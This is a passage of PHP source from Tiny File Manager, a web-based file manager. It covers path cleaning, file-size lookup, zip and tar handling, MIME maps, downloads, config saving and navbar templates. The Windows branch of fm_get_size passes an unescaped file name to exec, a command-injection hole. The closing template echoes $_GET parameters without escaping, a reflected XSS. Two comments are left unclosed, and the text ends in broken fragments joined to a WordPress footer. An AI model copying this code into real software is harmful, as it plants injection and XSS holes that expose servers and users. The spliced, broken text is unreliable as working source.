} else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } /** * Clean path * @param string $path * @return string */ function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } /** * Get parent path * @param string $path * @return bool|string */ function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fm_enc(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fm_enc(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fm_enc(fm_convert_win($file_path)) ); } } /** * Check file is in exclude list * @param string $name The name of the file/folder * @param string $path The full path of the file/folder * @return bool / function fm_is_exclude_items($name, $path) { $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($name, $exclude_items) && !in_array(".$ext", $exclude_items) && !in_array($path, $exclude_items)) { return true; } return false; } /** * get language translations from json file * @param int $tr * @return array */ function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if ($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } /** * @param string $file * Recover all file sizes larger than > 2GB. * Works on php 32bits and 64bits and supports linux * @return int|string */ function fm_get_size($file) { static $iswin = null; static $isdarwin = null; static $exec_works = null; // Set static variables once if ($iswin === null) { $iswin = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'; $isdarwin = strtoupper(PHP_OS) === 'DARWIN'; $exec_works = function_exists('exec') && !ini_get('safe_mode') && @exec('echo EXEC') === 'EXEC'; } // Attempt shell command if exec is available if ($exec_works) { $arg = escapeshellarg($file); $cmd = $iswin ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (!empty($output) && ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // Attempt Windows COM interface for Windows systems if ($iswin && class_exists('COM')) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile(realpath($file)); if (ctype_digit($size = $f->Size)) { return $size; } } catch (Exception $e) { // COM failed, fallback to filesize } } // Default to PHP's filesize function return filesize($file); } /** * Get nice filesize * @param int $size * @return string */ function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } /** * Get info about zip archive * @param string $path * @return array|bool */ function fm_get_zif_info($path, $ext) { if ($ext == 'zip' && function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder //'compression_method' => zip_entry_compressionmethod($zip_entry), ); } @zip_close($arch); return $filenames; } } elseif ($ext == 'tar' && class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach (new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("phar://" . $path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } /** * Encode html entities * @param string $text * @return string */ function fm_enc($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } /** * Prevent XSS attacks * @param string $text * @return string / function fm_isvalid_filename($text) { return (strpbrk($text, '/?%:|"<>') === FALSE) ? true : false; } /** * Save message in session * @param string $msg * @param string $status */ function fm_set_msg($msg, $status = 'ok') { $_SESSION[FM_SESSION_ID]['message'] = $msg; $_SESSION[FM_SESSION_ID]['status'] = $status; } /** * Check if string is in UTF-8 * @param string $string * @return int */ function fm_is_utf8($string) { return preg_match('//u', $string); } /** * Convert file name to UTF-8 in Windows * @param string $filename * @return string */ function fm_convert_win($filename) { if (FM_IS_WIN && function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } /** * @param $obj * @return array */ function fm_object_to_array($obj) { if (!is_object($obj) && !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } /** * Get CSS classname for file * @param string $path * @return string */ function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': case 'ps1': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } /** * Get image files extensions * @return array */ function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } /** * Get video files extensions * @return array */ function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } /** * Get audio files extensions * @return array */ function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } /** * Get text file extensions * @return array */ function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl', 'ps1' ); } /** * Get mime types of text files * @return array */ function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } /** * Get file names of text files w/o extensions * @return array */ function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } /** * Get online docs viewer supported files extensions * @return array */ function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } /** * It returns the mime type of a file based on its extension. * @param extension The file extension of the file you want to get the mime type for. * @return string|string[] The mime type of the file. */ function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if (empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } /** * This function scans the files and folder recursively, and return matching files * @param string $dir * @param string $filter * @return array|null */ function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH . '/' . $dir; if ($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } /** * Parameters: downloadFile(File Location, File Name, * max speed, is streaming * If streaming - videos will show as videos, images as images * instead of download prompt * https://stackoverflow.com/a/13821992/1164642 */ function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); if (is_array($contentType)) { $contentType = implode(' ', $contentType); } $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } /** * Class to work with zip files (using ZipArchive) */ class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } /** * Create archive with name $filename and files $files (RELATIVE PATHS!) * @param string $filename * @param array|string $files * @return bool */ public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } /** * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) * @param string $filename * @param string $path * @return bool */ public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } /** * Add folder recursively * @param string $path * @return bool */ private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } /** * Class to work with Tar files (using PharData) */ class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } /** * Create archive with name $filename and files $files (RELATIVE PATHS!) * @param string $filename * @param array|string $files * @return bool */ public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } /** * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) * @param string $filename * @param string $path * @return bool */ public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } /** * Add folder recursively * @param string $path * @return bool */ private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } /** * Save Configuration */ class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url . $_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'Tiny File Manager<br>Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '<br>'; $msg .= '<br>Seems like you have a trailing slash on the URL.'; $msg .= '<br>Try this link: <a href="' . $fm_url . '">' . $fm_url . '</a>'; } die($msg); } if (is_array($data) && count($data)) $this->data = $data; else $this->save(); } function save() { global $config_file; $fm_file = is_readable($config_file) ? $config_file : FILE; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = "<?php" . chr(13) . chr(10) . "//Default Configuration" . chr(13) . chr(10) . "$var_name = $var_value;" . chr(13) . chr(10); if (is_writable($fm_file)) { $lines = file($fm_file); if ($fh = @fopen($fm_file, "w")) { @fputs($fh, $config_string, strlen($config_string)); for ($x = 3; $x < count($lines); $x++) { @fputs($fh, $lines[$x], strlen($lines[$x])); } @fclose($fh); } } } } //--- Templates Functions --- /** * Show nav block * @param string $path */ function fm_show_nav_path($path) { global $lang, $sticky_navbar, $editFile; $isStickyNavBar = $sticky_navbar ? 'fixed-top' : ''; ?> <nav class="navbar navbar-expand-lg mb-4 main-nav <?php echo $isStickyNavBar ?> bg-body-tertiary" data-bs-theme="<?php echo FM_THEME; ?>"> <a class="navbar-brand"> <?php echo lng('AppTitle') ?> </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <?php $path = fm_clean_path($path); $root_url = "<a href='?p='><i class='fa fa-home' aria-hidden='true' title='" . FM_ROOT_PATH . "'></i></a>"; $sep = '<i class="bread-crumb"> / </i>'; if ($path != '') { $exploded = explode('/', $path); $count = count($exploded); $array = array(); $parent = ''; for ($i = 0; $i < $count; $i++) { $parent = trim($parent . '/' . $exploded[$i], '/'); $parent_enc = urlencode($parent); $array[] = "<a href='?p={$parent_enc}'>" . fm_enc(fm_convert_win($exploded[$i])) . "</a>"; } $root_url .= $sep . implode($sep, $array); } echo '<div class="col-xs-6 col-sm-5">' . $root_url . $editFile . '</div>'; ?> <div class="col-xs-6 col-sm-7"> <ul class="navbar-nav justify-content-end" data-bs-theme="<?php echo FM_THEME; ?>"> <li class="nav-item mr-2"> <div class="input-group input-group-sm mr-1" style="margin-top:4px;"> <input type="text" class="form-control" placeholder="<?php echo lng('Search') ?>" aria-label="<?php echo lng('Search') ?>" aria-describedby="search-addon2" id="search-addon"> <div class="input-group-append"> <span class="input-group-text brl-0 brr-0" id="search-addon2"><i class="fa fa-search"></i></span> </div> <div class="input-group-append btn-group"> <span class="input-group-text dropdown-toggle brl-0" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"></span> <div class="dropdown-menu dropdown-menu-right"> <a class="dropdown-item" href="<?php echo $path2 = $path ? $path : '.'; ?>" id="js-search-modal" data-bs-toggle="modal" data-bs-target="#searchModal"><?php echo lng('Advanced Search') ?></a> </div> </div> </div> </li> <?php if (!FM_READONLY): ?> <li class="nav-item"> <a title="<?php echo lng('Upload') ?>" class="nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&upload"><i class="fa fa-cloud-upload" aria-hidden="true"></i> <?php echo lng('Upload') ?></a> </li> <li class="nav-item"> <a title="<?php echo lng('NewItem') ?>" class="nav-link" href="#createNewItem" data-bs-toggle="modal" data-bs-target="#createNewItem"><i class="fa fa-plus-square"></i> <?php echo lng('NewItem') ?></a> </li> <?php endif; ?> <?php if (FM_USE_AUTH): ?> <li class="nav-item avatar dropdown"> <a class="nav-link dropdown-toggle" id="navbarDropdownMenuLink-5" data-bs-toggle="dropdown" aria-expanded="false"> <i class="fa fa-user-circle"></i> </a> <div class="dropdown-menu text-small shadow" aria-labelledby="navbarDropdownMenuLink-5" data-bs-theme="<?php echo FM_THEME; ?>"> <?php if (!FM_READONLY): ?> <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a> <?php endif ?> <a title="<?php echo lng('Help') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&help=2"><i class="fa fa-exclamation-circle" aria-hidden="true"></i> <?php echo lng('Help') ?></a> <a title="<?php echo lng('Logout') ?>" class="dropdown-item nav-link" href="?logout=1"><i class="fa fa-sign-out" aria-hidden="true"></i> <?php echo lng('Logout') ?></a> </div> </li> <?php else: ?> <?php if (!FM_READONLY): ?> <li class="nav-item"> <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a> </li> <?php endif; ?> <?php endif; ?> </ul> </div> </div> </nav> <?php } /** * Show alert message from session */ function fm_show_message() { if (isset($_SESSION[FM_SESSION_ID]['message'])) { $class = isset($_SESSION[FM_SESSION_ID]['status']) ? $_SESSION[FM_SESSION_ID]['status'] : 'ok'; echo '<p class="message ' . $class . '">' . $_SESSION[FM_SESSION_ID]['message'] . '</p>'; unset($_SESSION[FM_SESSION_ID]['message']); unset($_SESSION[FM_SESSION_ID]['status']); } } /** * Show page header in Login Form */ function fm_show_header_login() { header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $favicon_path; ?> <!DOCTYPE html> <html lang="en" data-bs-theme="<?php echo (FM_THEME == "dark") ? 'dark' : 'light' ?>"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager"> <meta name="author" content="CCP Programmers"> <meta name="robots" content="noindex, nofollow"> <meta name="googlebot" content="noindex"> <?php if ($favicon_path) { echo '<link rel="icon" href="' . fm_enc($favicon_path) . '" type="image/png">'; } ?> <title><?php echo fm_enc(APP_TITLE) ?> ">

'; } ?> <?php echo fm_enc(APP_TITLE) ?> | <?php echo (isset($_GET['view']) ? $_GET['view'] : ((isset($_GET['edit'])) ? $_GET['edit'] : "H3K")); ?> ">

Proudly powered by WordPress